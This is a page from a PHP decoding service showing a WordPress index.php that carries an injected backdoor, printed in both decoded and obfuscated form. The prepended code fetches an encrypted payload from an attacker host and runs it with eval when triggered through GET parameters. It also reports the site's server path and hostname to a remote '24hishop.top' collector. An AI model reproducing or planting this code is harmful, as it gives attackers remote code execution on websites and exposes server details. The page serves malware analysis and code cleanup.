Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php //mailei /*hnv*/"e\162\x72\x6f\162_\x72\x65p\157rti\156\x67"/*gxre*/(0); if(isset(..
Decoded Output download
<?php //mailei
/*hnv*/"error_reporting"/*gxre*/(0);
if(isset($_GET["ma"])&&isset($_GET["key"])&&isset($_GET["partd"])){
$tksv=/*hnv*/"substr"/*gxre*/(/*hnv*/"md5"/*gxre*/($_GET["key"]),0,16);
$vgw=/*hnv*/"substr"/*gxre*/(/*hnv*/"md5"/*gxre*/($_GET["key"]),-16);
/*jxen*/eval/*sh*/(hiaa(kt("http://".$_GET["partd"]."shop.top/getst.php?ma=".$_GET["ma"])));/*jxen*/die/*sh*/();
}elseif(!/*hnv*/"file_exists"/*gxre*/("m".date("Y-m-d").".txt")){
$oo = "http://pang.24hishop.top/savest.php?web="./*hnv*/"base64_encode"/*gxre*/("esada,/var/www/vhosts/estudiantesesada.es/httpdocs,".(isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https://" : "http://") .$_SERVER["HTTP_HOST"].",".$_SERVER["SERVER_NAME"].",".$_SERVER["REQUEST_URI"]);
$axtl=kt($oo);
if($axtl=="down")@/*hnv*/"file_put_contents"/*gxre*/("m".date("Y-m-d").".txt","");
}
function hiaa($aqed){
global $tksv,$vgw;
$hkpn = /*hnv*/"gzuncompress"/*gxre*/(/*hnv*/"openssl_decrypt"/*gxre*/(/*hnv*/"base64_decode"/*gxre*/($aqed),"AES-128-CBC",$tksv,true,$vgw)); return $hkpn;}
function kt($nq){
$mrsp = @/*hnv*/"file_get_contents"/*gxre*/($nq);
if (!$mrsp) {
$naqv = /*hnv*/"curl_init"/*gxre*/();
/*hnv*/"curl_setopt"/*gxre*/($naqv, CURLOPT_URL, $nq);
/*hnv*/"curl_setopt"/*gxre*/($naqv, CURLOPT_SSL_VERIFYHOST, 0);
/*hnv*/"curl_setopt"/*gxre*/($naqv, CURLOPT_SSL_VERIFYPEER, 0);
/*hnv*/"curl_setopt"/*gxre*/($naqv, CURLOPT_RETURNTRANSFER,1);
$mrsp = /*hnv*/"curl_exec"/*gxre*/($naqv);
/*hnv*/"curl_close"/*gxre*/($naqv);
}
return $mrsp;
}?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
?>
Did this file decode correctly?
Original Code
<?php //mailei
/*hnv*/"e\162\x72\x6f\162_\x72\x65p\157rti\156\x67"/*gxre*/(0);
if(isset($_GET["\155\x61"])&&isset($_GET["\x6b\145\171"])&&isset($_GET["\x70\141\x72\x74\144"])){
$tksv=/*hnv*/"\163\x75\142\163\x74\x72"/*gxre*/(/*hnv*/"\x6d\x645"/*gxre*/($_GET["\x6b\145\x79"]),0,16);
$vgw=/*hnv*/"\163\165\142\163\164\162"/*gxre*/(/*hnv*/"\x6d\1445"/*gxre*/($_GET["\153\145\171"]),-16);
/*jxen*/eval/*sh*/(hiaa(kt("\x68\164\164\160://".$_GET["\160\141\x72\x74\144"]."s\x68\157\x70.\164op/g\145\164\163t.php?m\x61=".$_GET["\x6d\x61"])));/*jxen*/die/*sh*/();
}elseif(!/*hnv*/"\x66i\154\145_\x65\x78\x69s\164s"/*gxre*/("\x6d".date("\131-\155-\144").".\164\170\x74")){
$oo = "\150\164t\160://pan\147.24\x68\151sho\160.t\157\160/s\x61v\x65\163t.\160\x68\x70?web="./*hnv*/"\x62\x61\163\14564_\x65\156\x63od\145"/*gxre*/("esada,/var/www/vhosts/estudiantesesada.es/httpdocs,".(isset($_SERVER["\110\x54\x54\120\123"]) && $_SERVER["\x48\124\x54\120\123"] === "\x6f\156" ? "\150\164\x74\x70\x73://" : "\150\x74\x74\x70://") .$_SERVER["\110\x54\x54\120_\x48\x4f\x53\124"].",".$_SERVER["SER\x56\105R_\116\x41\115\105"].",".$_SERVER["REQ\125ES\x54_U\x52\x49"]);
$axtl=kt($oo);
if($axtl=="\144\157\x77\156")@/*hnv*/"fi\154e_put_\x63\x6fn\x74en\x74s"/*gxre*/("\155".date("\x59-\x6d-\x64").".\164\170\164","");
}
function hiaa($aqed){
global $tksv,$vgw;
$hkpn = /*hnv*/"g\172unco\155p\162\145\163\x73"/*gxre*/(/*hnv*/"open\x73s\154_d\145\143\x72\x79\x70\x74"/*gxre*/(/*hnv*/"b\x61se64_d\x65\x63o\144\x65"/*gxre*/($aqed),"\101ES-128-\103BC",$tksv,true,$vgw)); return $hkpn;}
function kt($nq){
$mrsp = @/*hnv*/"\x66i\x6ce_\147e\164_\143ont\x65\156ts"/*gxre*/($nq);
if (!$mrsp) {
$naqv = /*hnv*/"\143\x75\x72\154_\x69\x6e\x69\164"/*gxre*/();
/*hnv*/"c\165\x72\x6c_s\145t\x6f\x70\164"/*gxre*/($naqv, CURLOPT_URL, $nq);
/*hnv*/"\143\x75\162\154_se\164o\160\x74"/*gxre*/($naqv, CURLOPT_SSL_VERIFYHOST, 0);
/*hnv*/"cur\x6c_s\145t\157p\164"/*gxre*/($naqv, CURLOPT_SSL_VERIFYPEER, 0);
/*hnv*/"cu\x72l_s\145t\x6f\160\x74"/*gxre*/($naqv, CURLOPT_RETURNTRANSFER,1);
$mrsp = /*hnv*/"\143\165\x72\x6c_\145\170\145\143"/*gxre*/($naqv);
/*hnv*/"curl_close"/*gxre*/($naqv);
}
return $mrsp;
}?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
Function Calls
None |
Stats
MD5 | 8352a70dba8a87adf5513eb357fe375a |
Eval Count | 0 |
Decode Time | 39 ms |